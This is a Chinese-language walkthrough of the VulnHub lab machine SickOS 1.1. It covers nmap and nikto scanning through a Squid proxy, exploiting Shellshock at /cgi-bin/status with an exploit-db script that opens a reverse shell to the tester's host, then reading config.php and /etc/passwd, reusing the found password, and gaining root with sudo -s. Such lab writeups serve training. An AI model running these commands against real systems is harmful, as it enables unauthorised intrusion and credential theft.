vulnhub - SickOS:1.1 writeup

主机来源:www.vulnhub.com

下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z

发现IP

安装成功后,查找此虚拟机的IP,我使用的是netdiscover

地址为10.0.3.143

nmap

nmap -sV -p- 10.0.3.143

漏扫

想了一下突破口肯定不是ssh,就从3128端口入手把,是个代理,那就通过这个代理扫描后面的站点

nikto -h 10.0.3.143 -useproxy http://10.0.3.143:3128

exploit

看到有个shellshock的洞,CVE编号是CVE2014-6271,还可以发现漏洞的路径是/cgi-bin/status

我们打下payload,exp可以这里下载

https://www.exploit-db.com/exploits/34900

python 34900.py payload=reverse rhost=10.0.3.143 lhost=10.0.3.141 lport=555 proxy=10.0.3.143:3128 pages=/cgi-bin/status/

然后就获得了一个不太好使但能用的shell

这期间尝试过直接提权,然后并没有成功,就在想其他方法。

想到这是个站点,就去看看网站目录下都有什么把。

 看到了什么,看到了config.php,来看看文件内容吧

 好东西,接下来看看这台机器的用户都有哪些,

cat /etc/passwd

这些用户名都试一下,看哪个密码是john@123

我猜是sickos,因为机器名字是这个,废话不多说,直接试把

提权

劳动人民的智慧,看下sudo列表

这就是传说中的送分题?

直接sudo -s

over

真over

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章